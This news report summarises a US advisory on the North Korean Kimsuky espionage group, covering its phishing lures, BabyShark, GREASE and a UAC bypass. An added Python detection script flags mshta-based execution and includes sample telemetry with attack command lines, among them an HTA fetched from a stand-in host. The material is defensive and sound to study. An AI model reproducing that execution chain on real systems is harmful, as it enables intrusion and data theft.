The US government has issued an advisory with information on the Kimsuky hacking group, a team affiliated with the North Korean government that focuses on intelligence gathering.
The advisory, issued jointly by CISA, the FBI and CNMF, says the group has been active since at least 2012 and relies mainly on techniques such as social engineering, spear-phishing and watering hole attacks.
According to the US advisory, Kimsuky targets individuals and organizations located in Japan, South Korea and the United States, and focuses mainly on gathering information on "foreign policy and national security issues". Its targets are therefore not chosen at random: they are individuals from whom the group can obtain valuable information on such matters.
For initial access, Kimsuky uses spear-phishing emails with malicious attachments as well as various social engineering methods. The attackers also send benign emails first in order to gain the victims' trust. Malicious scripts and tools are hosted on web hosting services accessed with stolen credentials.
Kimsuky operators pose to victims as South Korean journalists who want to conduct interviews on issues concerning Korea. One victim who agreed to an interview received a malicious document in a follow-up email, which infected their device with the BabyShark malware.
The North Korean hackers have tailored their spear-phishing emails to topics of current interest to the target, such as the COVID-19 crisis, North Korea's nuclear program and media interviews.
After gaining initial access, Kimsuky uses mshta.exe to run an HTML Application (HTA) file, which downloads and executes the encoded BabyShark VBS script. The script collects system information and sends it to the attackers' command and control (C&C) servers.
In 2018, during a campaign known as STOLEN PENCIL, Kimsuky used the GREASE malware, which adds a Windows administrator account and abuses RDP to give the intruders access to breached systems.
Kimsuky aims to collect Hangul Word Processor (HWP) and Microsoft Office documents, and uses web shells to upload, download and delete files.
In addition, the hackers can escalate privileges on the compromised system using scripts placed in the Startup folder, new services, and malicious code injected into explorer.exe. For example, the Win7Elevate exploit from the Metasploit framework was used to bypass User Account Control and inject malicious code into explorer.exe.
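As an added example that is not part of the original article or the advisory, the following Python script shows how a defender might flag the execution chain described above in endpoint telemetry: mshta.exe launched by an Office application or with a remote URL, a script host spawned by mshta.exe, and a file dropped into the Startup folder. Field names follow Sysmon conventions, and the sample events (paths, hostnames, file names) are constructed, not real logs.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list:
    """Return the names of the detection rules matched by one event."""
    hits = []
    kind = event.get("EventType")
    if kind == "ProcessCreate":
        image = _base(event.get("Image", ""))
        parent = _base(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "")
        if image == "mshta.exe" and URL_RE.search(cmd):
            hits.append("mshta_remote_hta")        # HTA fetched from a URL
        if image == "mshta.exe" and parent in OFFICE_PARENTS:
            hits.append("office_spawns_mshta")     # phishing document payload
        if image in SCRIPT_HOSTS and parent == "mshta.exe":
            hits.append("mshta_spawns_script_host")  # VBS second stage
    elif kind == "FileCreate":
        if STARTUP_RE.search(event.get("TargetFilename", "")):
            hits.append("startup_folder_write")    # persistence via Startup
    return hits

def scan(events: list) -> list:
    """Return (index, rules) for every event that matched at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := classify(e))]

# Constructed sample telemetry using Sysmon-style field names; not real logs.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r"mshta.exe http://placeholder.invalid/interview.hta"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"wscript.exe //e:vbscript C:\Users\Public\stage.txt"},
    {"EventType": "FileCreate", "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\Users\v\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",  # benign local HTA
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"mshta.exe C:\Tools\helper.hta"},
]
```

Running `scan(SAMPLE_EVENTS)` flags the first three events and leaves the locally launched HTA alone; in practice the rules would be tuned against the environment's own baseline of legitimate mshta.exe use.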
According to SecurityWeek, CISA and the FBI also described the methods Kimsuky uses to evade defenses, the various tools it uses to collect credentials, and its attacks on macOS systems.
Finally, the advisory emphasizes that Kimsuky's activities are limited to information collection and are not destructive.